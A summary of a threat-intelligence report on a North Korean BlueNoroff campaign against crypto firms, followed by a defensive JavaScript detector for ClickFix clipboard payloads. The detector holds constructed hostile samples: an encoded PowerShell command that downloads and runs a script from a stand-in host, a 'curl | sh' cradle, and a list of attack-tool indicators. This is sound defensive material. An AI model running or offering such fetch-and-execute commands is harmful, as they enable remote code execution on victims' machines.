Arctic Wolf Labs has published a detailed technical analysis of a BlueNoroff (Lazarus Group, DPRK) campaign targeting Web3 and cryptocurrency companies. The attack chain begins with spear-phishing via a manipulated Calendly invite containing a typo-squatted Zoom link. Victims are directed to a self-contained JavaScript fake meeting page that silently exfiltrates their webcam feed via getUserMedia and then delivers a ClickFix clipboard-injection attack, in which the page places a command on the victim's clipboard and talks them into pasting and running it themselves. A multi-stage, fileless PowerShell execution chain then achieves full system compromise in under five minutes. Post-exploitation modules steal Telegram sessions, enumerate installed software, harvest Chromium browser credentials (bypassing the app-bound encryption introduced in Chrome 127), and inject AES-encrypted shellcode into browser processes. The attacker maintains a deepfake production pipeline that combines stolen victim webcam footage with GPT-4o-generated AI portraits and Adobe Premiere Pro compositing to fabricate convincing fake meeting participants. Over 100 victims across 20+ countries were identified, 80% of them in the crypto/blockchain sector and 45% of them CEOs or founders. Operator timestamps align with DPRK business hours, supporting state-sponsored attribution.

Source: arcticwolf.com (53-minute read)

Report sections: Executive Summary, Technical Analysis, Weaponization, Targets, Attribution, Remediation, Conclusions, Appendix

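The ClickFix step above works because the command the victim pastes into the Run dialog is usually a one-liner that hides its real payload behind PowerShell's -EncodedCommand (base64 of the UTF-16LE command text), so a defender who only inspects the outer string misses the download cradle. The following is an added example, not code from the Arctic Wolf report or from the campaign, showing how a clipboard-monitoring hook or an EDR command-line rule could triage such a payload: it decodes any -EncodedCommand argument, scans both the outer and inner text against a set of indicators, and returns a verdict. The indicator list and scoring are this example's own assumptions, the sample payloads are constructed here, and example.invalid is a reserved, non-routable name used as a stand-in.

```javascript
// Added example (not from the Arctic Wolf report): heuristic triage of
// ClickFix-style clipboard payloads. Node.js only (uses Buffer); no network.
// Indicator names, patterns and the scoring rule are assumptions of this example.

const INDICATORS = [
  { name: 'powershell',        re: /\b(?:powershell(?:\.exe)?|pwsh)\b/i },
  { name: 'encoded-command',   re: /-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}/i },
  { name: 'hidden-window',     re: /-w\w*\s+hidden\b/i },              // -w / -wi / -WindowStyle hidden
  { name: 'bypass-policy',     re: /-e(?:p|x|xecutionpolicy)?\s+bypass\b/i },
  { name: 'download-cradle',   re: /\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|curl|wget)\b/i },
  { name: 'invoke-expression', re: /\b(?:iex|invoke-expression)\b/i },
  { name: 'mshta',             re: /\bmshta\b/i },
  { name: 'run-dialog-hint',   re: /win\s*\+\s*r\b|ctrl\s*\+\s*v\b/i }, // "press Win+R, then Ctrl+V" lure text
];

// PowerShell's -EncodedCommand carries base64 of the UTF-16LE command text.
// Decode it so the inner command is scanned too; the outer string rarely shows the cradle.
function decodeEncodedCommand(text) {
  const m = text.match(/-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})/i);
  if (!m) return null;
  const buf = Buffer.from(m[1], 'base64');
  return buf.length ? buf.toString('utf16le') : null;
}

// Used only to construct the sample payload below (the inverse of decodeEncodedCommand).
function buildEncodedCommand(cmd) {
  return Buffer.from(cmd, 'utf16le').toString('base64');
}

// Returns { verdict, indicators, decoded }. Scoring rule (an assumption): any hit is
// worth a look; a PowerShell launcher with three or more hits is treated as suspicious.
function classifyClipboardPayload(text) {
  const decoded = decodeEncodedCommand(text);
  const corpus = decoded ? `${text}\n${decoded}` : text;
  const indicators = INDICATORS.filter(i => i.re.test(corpus)).map(i => i.name);
  let verdict = 'benign';
  if (indicators.length > 0) verdict = 'review';
  if (indicators.includes('powershell') && indicators.length >= 3) verdict = 'suspicious';
  return { verdict, indicators, decoded };
}

// Constructed samples, not taken from the report. example.invalid is a reserved name.
const INNER = "iex (iwr 'http://example.invalid/s.ps1' -UseBasicParsing)";
const SAMPLES = {
  clickfix: `powershell -w hidden -ep bypass -enc ${buildEncodedCommand(INNER)}`,
  benign:   'git clone https://github.com/example/repo.git && cd repo',
  cradle:   'curl -sL https://example.invalid/install.sh | sh',
};

function scanSamples() {
  const out = {};
  for (const [name, text] of Object.entries(SAMPLES)) out[name] = classifyClipboardPayload(text);
  return out;
}

for (const [name, r] of Object.entries(scanSamples())) {
  console.log(`${name}: ${r.verdict} [${r.indicators.join(', ')}]`);
  if (r.decoded) console.log(`  decoded: ${r.decoded}`);
}
```

In a browser-side monitor the same function would be fed the text passed to navigator.clipboard.writeText or the data from a copy event; on the endpoint it would be fed the process command line from script-block or process-creation logging. The decode step is the part that matters: the constructed clickfix sample shows no cradle or invoke-expression in its outer text, and only the decoded inner command raises those indicators.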